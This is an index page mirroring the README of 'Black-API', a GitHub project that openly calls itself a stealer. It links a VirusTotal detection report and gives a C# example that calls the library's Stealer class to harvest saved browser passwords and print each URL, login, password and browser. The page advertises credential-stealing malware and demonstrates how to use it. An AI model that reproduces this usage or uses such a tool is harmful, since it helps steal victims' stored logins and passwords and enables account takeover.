Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/nekiplay/black-api

Stealer and more
https://github.com/nekiplay/black-api

Last synced: 24 days ago
JSON representation

Stealer and more

Awesome Lists containing this project

README

        

# Black-API
Stealer and more

[![Codacy Badge](https://app.codacy.com/project/badge/Grade/7576b1dcd41048f2843e5d4bee57d7bc)](https://www.codacy.com/gh/Nekiplay/Black-API/dashboard?utm_source=github.com&utm_medium=referral&utm_content=Nekiplay/Black-API&utm_campaign=Badge_Grade)

VT: https://www.virustotal.com/gui/file/06e364a178d9a65bc9f3e402841cfb5dc7dd5bba01183f9b6155b10969571676/detection

**Example:**
```C#
BlackAPI.Stealer stealer = new BlackAPI.Stealer();
var stealerresult = stealer.GetPasswords();
if (stealerresult.Work)
{
foreach (var password in stealerresult.Passwords)
{
Console.WriteLine("Url: " + password.url);
Console.WriteLine("Login: " + password.login);
Console.WriteLine("Password: " + password.password);
Console.WriteLine("Browser: " + password.browser);
}
Console.WriteLine("Total passwords: " + stealerresult.Passwords.Count);
}
else
{
Console.WriteLine("Passwords not found");
}
```